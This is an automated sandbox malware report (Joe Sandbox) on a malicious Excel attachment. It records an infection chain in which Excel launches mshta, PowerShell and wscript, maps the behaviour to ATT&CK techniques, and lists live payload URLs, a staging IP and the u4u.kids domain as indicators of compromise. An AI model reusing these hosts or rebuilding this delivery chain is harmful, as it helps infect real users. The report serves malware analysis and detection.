      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop Protocol1
      Archive Collected Data      		5
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts4
      PowerShell      		Logon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin Shares1
      Clipboard Data      		3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
      Obfuscated Files or Information      		LSA Secrets1
      Remote System Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Install Root Certificate      		Cached Domain Credentials1
      File and Directory Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSync14
      System Information Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1540833 Sample: A & C Metrology OC 5457144.xls Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 83 Suricata IDS alerts for network traffic 2->83 85 Malicious sample detected (through community Yara rule) 2->85 87 Multi AV Scanner detection for submitted file 2->87 89 16 other signatures 2->89 10 EXCEL.EXE 59 33 2->10         started        process3 dnsIp4 71 192.210.215.8, 49162, 49164, 49165 AS-COLOCROSSINGUS United States 10->71 73 u4u.kids 24.199.88.84, 443, 49161, 49163 TWC-12271-NYCUS United States 10->73 63 C:\...\A & C Metrology OC 5457144.xls (copy), Composite 10->63 dropped 65 uwantskillthingsto...onewithuthat[1].hta, HTML 10->65 dropped 109 Microsoft Office drops suspicious files 10->109 15 mshta.exe 10 10->15         started        19 mshta.exe 10 10->19         started        file5 signatures6 process7 dnsIp8 75 u4u.kids 15->75 79 Suspicious powershell command line found 15->79 81 PowerShell case anomaly found 15->81 21 powershell.exe 24 15->21         started        77 u4u.kids 19->77 25 powershell.exe 19->25         started        signatures9 process10 file11 59 C:\...\createdbestthingswithniceworkgreat.vbS, Unicode 21->59 dropped 61 C:\Users\user\AppData\...\td4qmpaq.cmdline, Unicode 21->61 dropped 91 Suspicious powershell command line found 21->91 93 Obfuscated command line found 21->93 27 wscript.exe 1 21->27         started        30 powershell.exe 4 21->30         started        32 csc.exe 2 21->32         started        35 wscript.exe 25->35         started        37 csc.exe 25->37         started        39 powershell.exe 25->39         started        signatures12 process13 file14 99 Suspicious powershell command line found 27->99 101 Wscript starts Powershell (via cmd or directly) 27->101 103 Bypasses PowerShell execution policy 27->103 107 2 other signatures 27->107 41 powershell.exe 2 27->41         started        105 Installs new ROOT certificates 30->105 55 C:\Users\user\AppData\Local\...\td4qmpaq.dll, PE32 32->55 dropped 44 cvtres.exe 32->44         started        46 powershell.exe 35->46         started        57 C:\Users\user\AppData\Local\...\mans504x.dll, PE32 37->57 dropped 48 cvtres.exe 37->48         started        signatures15 process16 signatures17 95 Suspicious powershell command line found 41->95 97 Obfuscated command line found 41->97 50 powershell.exe 12 4 41->50         started        53 powershell.exe 46->53         started        process18 dnsIp19 67 drive.usercontent.google.com 142.250.186.97, 443, 49172, 49174 GOOGLEUS United States 50->67 69 drive.google.com 216.58.212.174, 443, 49171, 49173 GOOGLEUS United States 50->69

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      A & C Metrology OC 5457144.xls18%ReversingLabs
      A & C Metrology OC 5457144.xls100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://ocsp.entrust.net030%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
      http://go.micros0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      https://nuget.org/nuget.exe0%URL Reputationsafe
      http://ocsp.entrust.net0D0%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      http://nuget.org/NuGet.exe0%URL Reputationsafe
      http://crl.entrust.net/server1.crl00%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      https://secure.comodo.com/CPS00%URL Reputationsafe
      http://crl.entrust.net/2048ca.crl00%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		216.58.212.174
      		truefalse
        		unknown
        drive.usercontent.google.com
        		142.250.186.97
        		truefalse
          		unknown
          u4u.kids
          		24.199.88.84
          		truefalse
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFtrue
              		unknown
              http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htatrue
                		unknown
                https://u4u.kids/LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottlingfalse
                  		unknown
                  http://192.210.215.8/540/ERFFDR.txttrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta5mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta3mshta.exe, 00000004.00000003.427286039.0000000000311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426419047.0000000000311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.428563336.0000000000311000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://u4u.kids/mshta.exe, 00000004.00000003.426419047.0000000000328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.428563336.0000000000328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427286039.0000000000328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://ocsp.entrust.net03mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta//1C:mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://go.microspowershell.exe, 00000005.00000002.458032894.000000000350C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/powershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaUCmshta.exe, 00000004.00000003.427286039.0000000000311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426419047.0000000000311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.428563336.0000000000311000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://drive.usercontent.google.compowershell.exe, 0000000E.00000002.517859410.0000000002697000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539375393.0000000002A17000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://ocsp.entrust.net0Dmshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.458032894.0000000002151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.517859410.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.488335048.00000000021B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539375393.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://u4u.kids/Kmshta.exe, 00000004.00000003.427837795.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429202754.000000000335C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://go.crpowershell.exe, 00000005.00000002.475447334.000000001C1F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFppowershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta50A%25253Chmshta.exe, 00000004.00000002.429236849.000000000337D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426395539.000000000337C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428101391.000000000337C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFVpowershell.exe, 00000011.00000002.495821234.000000001AA8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFZpowershell.exe, 00000005.00000002.473584199.000000001A227000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaEMmshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://u4u.kids/bmshta.exe, 00000004.00000003.427837795.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429202754.000000000335C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://contoso.com/Iconpowershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFCpowershell.exe, 00000005.00000002.473584199.000000001A227000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htagmshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htahttp://192.210.2mshta.exe, 00000004.00000003.427607890.0000000002565000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470138759.0000000002285000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476638710.0000000002285000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFIpowershell.exe, 00000011.00000002.495821234.000000001AA8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htacepC:mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta...mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://crl.usertrumshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://192.210.215.8/mshta.exe, 00000004.00000003.427837795.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429202754.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://u4u.kids/LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&Smshta.exe, 0000000F.00000002.479317402.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BE0000.00000004.00000020.00020000.00000000.sdmp, A & C Metrology OC 5457144.xls, 54330000.0.drfalse
                                                                    		unknown
                                                                    https://u4u.kids/ntmshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaMmshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://192.210.215.8/540/createdpowershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaPmshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://drive.google.compowershell.exe, 0000000E.00000002.517859410.00000000024D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539375393.0000000002852000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                		unknown
                                                                                http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaP(mshta.exe, 0000000F.00000003.467508099.0000000003C67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://secure.comodo.com/CPS0mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta?mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    24.199.88.84
                                                                                    		u4u.kidsUnited States
                                                                                    		12271TWC-12271-NYCUSfalse
                                                                                    192.210.215.8
                                                                                    		unknownUnited States
                                                                                    		36352AS-COLOCROSSINGUStrue
                                                                                    216.58.212.174
                                                                                    		drive.google.comUnited States
                                                                                    		15169GOOGLEUSfalse
                                                                                    142.250.186.97
                                                                                    		drive.usercontent.google.comUnited States
                                                                                    		15169GOOGLEUSfalse

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1540833
                                                                                    Start date and time:2024-10-24 08:38:09 +02:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 7m 23s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                    Number of analysed new started processes analysed:30
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • GSI enabled (VBA)
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Sample name:A & C Metrology OC 5457144.xls
                                                                                    Detection:MAL
                                                                                    Classification:mal100.expl.evad.winXLS@31/45@7/4
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 33.3%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    • Number of executed functions: 10
                                                                                    • Number of non-executed functions: 2
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .xls
                                                                                    • Changed system and user locale, location and keyboard layout to French - France
                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                    • Attach to Office via COM
                                                                                    • Active ActiveX Object
                                                                                    • Active ActiveX Object
                                                                                    • Scroll down
                                                                                    • Close Viewer

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                    • Execution Graph export aborted for target mshta.exe, PID 1884 because there are no executed function
                                                                                    • Execution Graph export aborted for target mshta.exe, PID 3688 because there are no executed function
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • VT rate limit hit for: A & C Metrology OC 5457144.xls

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    02:39:28API Interceptor118x Sleep call for process: mshta.exe modified
                                                                                    02:39:34API Interceptor909x Sleep call for process: powershell.exe modified
                                                                                    02:39:46API Interceptor18x Sleep call for process: wscript.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    24.199.88.84PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                                                                                      PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                                                                        Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                          Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                                                                                            InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
